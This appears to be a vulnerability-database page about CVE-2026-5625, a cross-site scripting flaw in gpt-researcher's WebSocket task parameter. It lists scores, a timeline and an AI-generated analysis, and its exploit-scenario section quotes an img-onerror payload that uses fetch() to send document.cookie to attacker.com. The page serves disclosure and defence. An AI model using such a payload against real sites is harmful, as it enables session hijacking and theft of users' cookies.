Is there a public PoC exploit available for CVE-2026-5625?

Yes, a public proof-of-concept exploit is available for CVE-2026-5625. Prioritise patching immediately. EPSS: 0.0%.

Gpt Researcher CVE-2026-5625

Q: What is the CVSS score of CVE-2026-5625?

CVE-2026-5625 has a CVSS 4.0 base score of 2.1 (Low). CVSS vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X. EPSS exploitation probability: 0.0%.

EUVD-2026-19178 LOW

Cross-site Scripting (XSS) (CWE-79)

2026-04-06 VulDB

GHSA-9v4r-x2jq-w7jg

XSS Gpt Researcher

2.1

CVSS 4.0 · NVD

Severity by source

NVD PRIMARY

2.1 LOW

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

Scope

Lifecycle Timeline

Severity Changed

Apr 29, 2026 - 01:11 NVD

MEDIUM LOW

CVSS changed

Apr 29, 2026 - 01:11 NVD

5.3 (MEDIUM) 2.1 (LOW)

PoC Detected

Apr 07, 2026 - 13:20 vuln.today

Public exploit code

EUVD ID Assigned

Apr 06, 2026 - 05:45 euvd

EUVD-2026-19178

Analysis Generated

Apr 06, 2026 - 05:45 vuln.today

CVE Published

Apr 06, 2026 - 05:15 nvd

MEDIUM 5.3

DescriptionCVE.org

A weakness has been identified in assafelovic gpt-researcher up to 3.4.3. This issue affects some unknown processing of the file gpt_researcher/skills/researcher.py of the component WebSocket Interface. Executing a manipulation of the argument task can lead to cross site scripting. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.

AnalysisAI

Cross-site scripting (XSS) vulnerability in assafelovic gpt-researcher up to version 3.4.3 allows unauthenticated remote attackers to inject malicious scripts via manipulation of the task argument in the WebSocket Interface component. Publicly available exploit code exists, and the vulnerability affects the file gpt_researcher/skills/researcher.py with low CVSS severity (4.3) but confirmed proof-of-concept availability indicating active technical feasibility.

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Vulnerability AssessmentAI

Risk Assessment	While the CVSS score of 4.3 is relatively low, the signal analysis presents a mixed picture. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An attacker crafts a malicious research request with an XSS payload embedded in the task parameter (e.g., task parameter containing "<img src=x onerror='fetch(attacker.com/steal?cookie='+document.cookie)'>" or similar JavaScript code). When a legitimate user interacts with the gpt-researcher WebSocket interface and processes this request, the malicious script executes in their browser context, potentially allowing the attacker to steal session cookies, capture keystrokes, or perform actions on behalf of the authenticated user. …
Remediation	No vendor-released patch identified at time of analysis; the vendor has not responded to the early notification. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2026-5625 vulnerability details – vuln.today

Back